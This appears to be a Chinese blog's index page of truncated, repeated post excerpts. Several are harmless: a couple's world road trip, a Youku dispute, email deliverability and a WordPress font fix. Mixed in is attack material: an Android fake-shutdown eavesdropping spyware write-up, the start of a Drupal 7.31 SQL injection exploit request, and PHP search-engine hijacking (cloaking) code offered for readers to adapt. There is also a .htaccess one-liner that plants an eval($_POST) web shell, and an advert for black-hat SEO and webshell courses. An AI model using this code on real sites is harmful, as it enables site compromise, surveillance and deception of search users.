看过这篇文章时，很是羡慕更佩服这两位长者，想想人这一辈子又是多大点事呢，天天瞎忙值得吗，三五成群喝酒吹牛的事以后不会再干了，好好脚踏实地攒些钱吧。  当然，每个人的生活都是不可被复制的，希望各位榴友也能带着另一半有段的精彩旅程……更能拥有幸福甜美的爱情……近日，BBC 的一个专题故事介绍了一对传奇的德国夫妻——Gunther Holtorf 和 Christine Holtorf，他们俩开着一辆吉普车用26年的时间走遍177个国家，跨越6个大洲，行程约89万公里，这个里程要比往返一趟月球都长。2010年，在这段旅行还没有结束的时候，太太 Christine 已经去世，76岁的老头 Gunther Holtorf 带着妻子的照片独自一人行走了一段时间后也回到了柏林。一起相约去看这个世界上最美的风景在旅途中，他们遭受过疾病、战乱、车祸等诸多艰难险阻，20多年中，他们在野外搭帐篷、睡吊床或者睡在车里，唯独没有住过任何一家旅馆。5次疟疾缠身威胁到生命也没能让他们停下脚步。在美好的午后，一起晒太阳从巴黎到肯尼亚、从上海到平壤，这对一直在路上的夫妻开着他们的吉普车见证了这个世界丰富多彩的文化，看到了那些濒临灭绝的野生动物以及这个世界上最美丽的风景。据 Gunther Holtorf 粗略的估计，考虑通货膨胀等原因，这26年他们大概花费了345万人 ...继续阅读 (5)

看过这篇文章时，很是羡慕更佩服这两位长者，想想人这一辈子又是多大点事呢，天天瞎忙值得吗，三五成群喝酒吹牛的事以后不会再干了，好好脚踏实地攒些钱吧。  当然，每个人的生活都是不可被复制的，希望各位榴友也能带着另一半有段的精彩旅程……更能拥有幸福甜美的爱情……近日，BBC 的一个专题故事介绍了一对传奇的德国夫妻——Gunther Holtorf 和 Christine Holtorf，他们俩开着一辆吉普车用26年的时间走遍177个国家，跨越6个大洲，行程约89万公里，这个里程要比往返一趟月球都长。2010年，在这段旅行还没有结束的时候，太太 Christine 已经去世，76岁的老头 Gunther Holtorf 带着妻子的照片独自一人行走了一段时间后也回到了柏林。一起相约去看这个世界上最美的风景在旅途中，他们遭受过疾病、战乱、车祸等诸多艰难险阻，20多年中，他们在野外搭帐篷、睡吊床或者睡在车里，唯独没有住过任何一家旅馆。5次疟疾缠身威胁到生命也没能让他们停下脚步。在美好的午后，一起晒太阳从巴黎到肯尼亚、从上海到平壤，这对一直在路上的夫妻开着他们的吉普车见证了这个世界丰富多彩的文化，看到了那些濒临灭绝的野生动物以及这个世界上最美丽的风景。据 Gunther Holtorf 粗略的估计，考虑通货膨胀等原因，这26年他们大概花费了345万人 ...继续阅读 (5)

我是NIKO EDWARDS ,相信没有多少人听过我的名字。对，我就是一个19岁的普通少年。但相比之下，优酷跟 陌陌大家都耳熟能详，这两个大品牌最近做了一件挺了不起的事情。现在我们来讲一讲事情的来龙去脉：首先我们在2014年9月3号成功的拍摄了地球接着在9月8号接着我们将我们的故事发布在了网络这件事情在微信朋友圈引起了一些关注 有几家媒体以及订阅号报道转载了我们事迹（《追气球的熊孩子》的原内容在此篇文章底部左下角点击 阅读原文 即可查看 ）这其中也就包括了 优酷的制作团队 来找我们合作拍摄短片 先是 优酷网的编辑 于某 在微博上与我取得联系接着在 10月10号 身为 优酷创意制片的王某 发来了以下邮件内容：说得是娓娓动人 感天动地其实所说的劳务费基本就是在糊弄我们不过看在这么”诚挚”的邀请 我们答应了与他们的拍摄合作 也提出了几点我们的疑问：优酷的 王某 在邮件中看似细致的回答了我们的问题：但在骗取了我们的信任之后 王某以拍摄的名义问及了我们设备的内容以及制作的过程 直到后来我们才知道 他问我们的问题 不是为了算入拍摄预算 而他所谓的合作其实就是想窃取我们的拍摄方式以及想法接着 在一个多月里 小伙子 王某 就是这样对待我们的：在这个时候我们多次的打电话给他 他不是没接就是关机 其实我们也考虑到他身为制片 应该是很繁忙 遗憾的是 我们的理解换来的却是精心策划的 ...继续阅读 (27)

我是NIKO EDWARDS ,相信没有多少人听过我的名字。对，我就是一个19岁的普通少年。但相比之下，优酷跟 陌陌大家都耳熟能详，这两个大品牌最近做了一件挺了不起的事情。现在我们来讲一讲事情的来龙去脉：首先我们在2014年9月3号成功的拍摄了地球接着在9月8号接着我们将我们的故事发布在了网络这件事情在微信朋友圈引起了一些关注 有几家媒体以及订阅号报道转载了我们事迹（《追气球的熊孩子》的原内容在此篇文章底部左下角点击 阅读原文 即可查看 ）这其中也就包括了 优酷的制作团队 来找我们合作拍摄短片 先是 优酷网的编辑 于某 在微博上与我取得联系接着在 10月10号 身为 优酷创意制片的王某 发来了以下邮件内容：说得是娓娓动人 感天动地其实所说的劳务费基本就是在糊弄我们不过看在这么”诚挚”的邀请 我们答应了与他们的拍摄合作 也提出了几点我们的疑问：优酷的 王某 在邮件中看似细致的回答了我们的问题：但在骗取了我们的信任之后 王某以拍摄的名义问及了我们设备的内容以及制作的过程 直到后来我们才知道 他问我们的问题 不是为了算入拍摄预算 而他所谓的合作其实就是想窃取我们的拍摄方式以及想法接着 在一个多月里 小伙子 王某 就是这样对待我们的：在这个时候我们多次的打电话给他 他不是没接就是关机 其实我们也考虑到他身为制片 应该是很繁忙 遗憾的是 我们的理解换来的却是精心策划的 ...继续阅读 (1)

我是NIKO EDWARDS ,相信没有多少人听过我的名字。对，我就是一个19岁的普通少年。但相比之下，优酷跟 陌陌大家都耳熟能详，这两个大品牌最近做了一件挺了不起的事情。现在我们来讲一讲事情的来龙去脉：首先我们在2014年9月3号成功的拍摄了地球接着在9月8号接着我们将我们的故事发布在了网络这件事情在微信朋友圈引起了一些关注 有几家媒体以及订阅号报道转载了我们事迹（《追气球的熊孩子》的原内容在此篇文章底部左下角点击 阅读原文 即可查看 ）这其中也就包括了 优酷的制作团队 来找我们合作拍摄短片 先是 优酷网的编辑 于某 在微博上与我取得联系接着在 10月10号 身为 优酷创意制片的王某 发来了以下邮件内容：说得是娓娓动人 感天动地其实所说的劳务费基本就是在糊弄我们不过看在这么”诚挚”的邀请 我们答应了与他们的拍摄合作 也提出了几点我们的疑问：优酷的 王某 在邮件中看似细致的回答了我们的问题：但在骗取了我们的信任之后 王某以拍摄的名义问及了我们设备的内容以及制作的过程 直到后来我们才知道 他问我们的问题 不是为了算入拍摄预算 而他所谓的合作其实就是想窃取我们的拍摄方式以及想法接着 在一个多月里 小伙子 王某 就是这样对待我们的：在这个时候我们多次的打电话给他 他不是没接就是关机 其实我们也考虑到他身为制片 应该是很繁忙 遗憾的是 我们的理解换来的却是精心策划的 ...继续阅读 (10)

原文地址  http://security.tencent.com/index.php/blog/msg/73前言斯诺登此前在接受采访时曾指出美国国家安全局（NSA）可以对手机进行窃听，即使是在关机的情况下也不能幸免。就在不久前的GeekPwn大赛（一个旨在演示智能设备安全漏洞利用、宣传安全意识的会议）上，来自KeenTeam的高手现场演示了Android手机在关机状态下被黑客通过听筒进行窃听的全过程，如此炫酷的神技原来果真存在。视频地址：http://v.qq.com/page/v/e/x/v0141kvwrex.html“没有想不到，只有做不到”。在强烈的好奇心的驱使下，笔者根据猜想，分析和模仿实现了一个类似的场景。技术原理就是在Android手机上安装用于窃听的程序伪装成关机状态后实现监听、偷拍等操作，并远程发送给坏人。先看看效果，手机虽然被“关机”了，但是电话仍然可以拨通，这时声音会通过电话传给黑客而让用户毫不察觉。安卓系统源码分析要对关机做手脚，先要了解它到底是怎么关机的。来看下Android源码对关机事件的处理。从按电源键开始，下面是PhoneWindowManager.interceptKeyBeforeQueueing方法的部分代码，如图1。图 1interceptKeyBeforeQueueing方法主要做一些对特殊按键的处理，这里可以看到当电源键按下时做一些处理 ...继续阅读 (17)

原文地址  http://security.tencent.com/index.php/blog/msg/73前言斯诺登此前在接受采访时曾指出美国国家安全局（NSA）可以对手机进行窃听，即使是在关机的情况下也不能幸免。就在不久前的GeekPwn大赛（一个旨在演示智能设备安全漏洞利用、宣传安全意识的会议）上，来自KeenTeam的高手现场演示了Android手机在关机状态下被黑客通过听筒进行窃听的全过程，如此炫酷的神技原来果真存在。视频地址：http://v.qq.com/page/v/e/x/v0141kvwrex.html“没有想不到，只有做不到”。在强烈的好奇心的驱使下，笔者根据猜想，分析和模仿实现了一个类似的场景。技术原理就是在Android手机上安装用于窃听的程序伪装成关机状态后实现监听、偷拍等操作，并远程发送给坏人。先看看效果，手机虽然被“关机”了，但是电话仍然可以拨通，这时声音会通过电话传给黑客而让用户毫不察觉。  安卓系统源码分析要对关机做手脚，先要了解它到底是怎么关机的。来看下Android源码对关机事件的处理。从按电源键开始，下面是PhoneWindowManager.interceptKeyBeforeQueueing方法的部分代码，如图1。图 1interceptKeyBeforeQueueing方法主要做一些对特殊按键的处理，这里可以看到 ...继续阅读 (3)

原文地址  http://security.tencent.com/index.php/blog/msg/73前言斯诺登此前在接受采访时曾指出美国国家安全局（NSA）可以对手机进行窃听，即使是在关机的情况下也不能幸免。就在不久前的GeekPwn大赛（一个旨在演示智能设备安全漏洞利用、宣传安全意识的会议）上，来自KeenTeam的高手现场演示了Android手机在关机状态下被黑客通过听筒进行窃听的全过程，如此炫酷的神技原来果真存在。视频地址：http://v.qq.com/page/v/e/x/v0141kvwrex.html“没有想不到，只有做不到”。在强烈的好奇心的驱使下，笔者根据猜想，分析和模仿实现了一个类似的场景。技术原理就是在Android手机上安装用于窃听的程序伪装成关机状态后实现监听、偷拍等操作，并远程发送给坏人。先看看效果，手机虽然被“关机”了，但是电话仍然可以拨通，这时声音会通过电话传给黑客而让用户毫不察觉。 安卓系统源码分析要对关机做手脚，先要了解它到底是怎么关机的。来看下Android源码对关机事件的处理。从按电源键开始，下面是PhoneWindowManager.interceptKeyBeforeQueueing方法的部分代码，如图1。图 1interceptKeyBeforeQueueing方法主要做一些对特殊按键的处理，这里可以看到当电源键按下时做一些 ...继续阅读 (2)

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并给出了利用的EXP代码，小编在本地搭建Drupal7.31的环境，经过测试，发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。测试代码POST/drupal-7.31/?q=node&destination;=node HTTP/1.1Host:127.0.0.1User-Agent:Mozilla/5.0(X11;Ubuntu;Linuxx86_64;rv:28.0)Gecko/20100101Firefox/28.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/drupal-7.31/ Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Lengt ...继续阅读 (15)

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并给出了利用的EXP代码，小编在本地搭建Drupal7.31的环境，经过测试，发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。测试代码<span class="pln">POST </span><span class="pun">/</span><span class="pln">drupal</span><span class="pun">-</span><span class="lit">7.31</span><span class="pun">/?</span><span class="pln">q</span><span class="pun">=</span><span class="pln">node</span><span class="pun">&amp;</span><span class="pln">destination</span><span class="pun">=& ...继续阅读 (3)

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并给出了利用的EXP代码，小编在本地搭建Drupal7.31的环境，经过测试，发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。测试代码POST/drupal-7.31/?q=node&destination=node HTTP/1.1Host:127.0.0.1User-Agent:Mozilla/5.0(X11;Ubuntu;Linuxx86_64;rv:28.0)Gecko/20100101Firefox/28.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/drupal-7.31/ Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Le ...继续阅读 (1)

怎么样才能让自己服务器发出的邮件不被 Gmail、Hotmail、163、QQ 等邮箱放入垃圾箱？保证邮件能进入收件箱并有高反馈的核心在于“发送对联系人有价值的内容”。只有当你所发送的信息，对收件人来说是感兴趣的、需要的、相关的、有价值的，他才可能把发件人设置为白名单，把邮件从垃圾箱移入收件箱，星标邮件、打开邮件、点击链接。否则做再多的认证设置，再好的ISP关系也不可能持久地让邮件到达联系人的收件箱。第一步是判断连接，如果你的IP域名在黑名单在这一步可能就直接被拒掉了；第二步是判断账户，如果收件地址不存在、邮箱已满在这一步会被弹回；第三步是邮件过滤，不同的ISP有不同的filter，这是他们拦截垃圾邮件的技术核心；第四步会根据之前的综合判断，把邮件投递进收件箱、垃圾箱、或者ISP黑洞。所以必须经过这么几步的严格过滤，才有可能让邮件进入联系人的收件箱。影响邮件送达与垃圾箱表现的因素主要有四点：技术设置（Technical components）认证设置（Sender authentication）邮件内容（Email Content）信誉度（Reputation）1.技术设置（Technical components）1.1 IP Address固定的IP地址。根据自己的发送量租用几个、几十个IP，每年也不会很贵。动态IP是垃圾邮件发送的一大特征，很容易被屏蔽。IP是邮件发送的本源， ...继续阅读 (36)

怎么样才能让自己服务器发出的邮件不被 Gmail、Hotmail、163、QQ 等邮箱放入垃圾箱？保证邮件能进入收件箱并有高反馈的核心在于“发送对联系人有价值的内容”。只有当你所发送的信息，对收件人来说是感兴趣的、需要的、相关的、有价值的，他才可能把发件人设置为白名单，把邮件从垃圾箱移入收件箱，星标邮件、打开邮件、点击链接。否则做再多的认证设置，再好的ISP关系也不可能持久地让邮件到达联系人的收件箱。第一步是判断连接，如果你的IP域名在黑名单在这一步可能就直接被拒掉了；第二步是判断账户，如果收件地址不存在、邮箱已满在这一步会被弹回；第三步是邮件过滤，不同的ISP有不同的filter，这是他们拦截垃圾邮件的技术核心；第四步会根据之前的综合判断，把邮件投递进收件箱、垃圾箱、或者ISP黑洞。所以必须经过这么几步的严格过滤，才有可能让邮件进入联系人的收件箱。影响邮件送达与垃圾箱表现的因素主要有四点：技术设置（Technical components）认证设置（Sender authentication）邮件内容（Email Content）信誉度（Reputation）1.技术设置（Technical components）1.1 IP Address固定的IP地址。根据自己的发送量租用几个、几十个IP，每年也不会很贵。动态IP是垃圾邮件发送的一大特征，很容易被屏蔽。IP是邮件发送的本源， ...继续阅读 (7)

在乌云上看见的几个php快照劫持代码 在这记录一下 大家用的时候 改一下 自己发挥第一个php $file=”http://www.xxx.com”; $referer=$_SERVER["HTTP_REFERER"]; $agent= strtolower($_SERVER["HTTP_USER_AGENT"]); if(strstr($referer,”baidu”)&&strstr;($referer,”456″)) { Header(“Location: $url”); } if(ereg(“http://www.baidu.com/search/spider.htm”,$agent)) { $content=file_get_contents($file); echo $content; exit; } ?第二个php error_reporting(0); $refer=$_SERVER['HTTP_REFERER']; if(stristr($refer,"baidu.com")||stristr($refer,"sogou.com")||stristr($refer,"soso.com")||stristr($refer,"google.cn")||stristr($refer,"bing.com")||stristr($refer,"youdao.com")|| ...继续阅读 (30)

在乌云上看见的几个php快照劫持代码 在这记录一下 大家用的时候 改一下 自己发挥第一个php $file=”http://www.xxx.com”; $referer=$_SERVER["HTTP_REFERER"]; $agent= strtolower($_SERVER["HTTP_USER_AGENT"]); if(strstr($referer,”baidu”)&&strstr($referer,”456″)) { Header(“Location: $url”); } if(ereg(“http://www.baidu.com/search/spider.htm”,$agent)) { $content=file_get_contents($file); echo $content; exit; } ?第二个php error_reporting(0); $refer=$_SERVER['HTTP_REFERER']; if(stristr($refer,"baidu.com")||stristr($refer,"sogou.com")||stristr($refer,"soso.com")||stristr($refer,"google.cn")||stristr($refer,"bing.com")||stristr($refer,"youdao.com")||s ...继续阅读 (10)

今天在乌云看到的文章，虽然方法很早大家都在用的，还是在说一遍太机智了PHP .htaccess: php_value auto_append_file .htaccess #php eval($_POST[1]); ...继续阅读 (28)

今天在乌云看到的文章，虽然方法很早大家都在用的，还是在说一遍太机智了PHP .htaccess: php_value auto_append_file .htaccess # ...继续阅读 (7)

地址 http://pan.baidu.com/s/1kTxFNAB 密码加群93053906获取黑帽SEO培训教程第一季：第一课：ASP劫持第二课：PHP劫持第三课：HTML劫持第四课：WEBSHELL介绍及应用-第五课：ASP版百万目录轮链做法第六课：PHP版百万目录轮链做法第七课：拼音二级域名泛解析黑帽SEO培训教程第二季：asp-动态内页劫持升级版教程代码PHP生成静态HTM新闻源劫持视频教程PHP生成静态HTM模板标签修改shell二级目录泛站使用教程代码私服企业站群排名做法第一课：ASP劫持第二课：PHP劫持第三课：HTML劫持第四课：WEBSHELL介绍及应用第五课：PHP版百万目录轮链做法第六课：PHP版百万目录轮链做法第七课：拼音二级域名泛解析第八课：基础跳转嵌入方法上（跳转）第九课：基础跳转嵌入方法下（嵌入）第十课：做黑帽需要的技巧-最后一课织梦dedecms的动态php及静态html的劫持网站内页添加劫持操作视频教程菠菜排名目录建站-第二课：目录排名建站方法详解ASP主页替换劫持银行卡出售排名做法-目录轮链隐蔽的内页劫持做法黑帽seo外贸的排名做法视频教程 ...继续阅读 (29)

自从google被彻底隔离以后，wordpress后台速度越来越慢，原因是wordpress后台调用 fonts.googleapis.com 的字体库,解决方法也很简单，替换掉或者删掉就可以了字体库替换打开wordpress代码中的wp-includes/script-loader.php文件，搜索fonts.googleapis.com找到如下代码$open_sans_font_url = "//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,300,400,600⊂=$subsets";将其中的fonts.googleapis.com替换为fonts.useso.com即可改善 useso.com这个是360的cdn字体库另外，赞一下360的cdn服务，免费很不错var wumiiSitePrefix = "http://www.saoyu.com"; var wumiiEnableCustomPos = false; var wumiiParams = "&num=5&mode=3&displayInFeed=0&version=1.0.5.7&pf=WordPress4.0.5"; ...继续阅读 (22)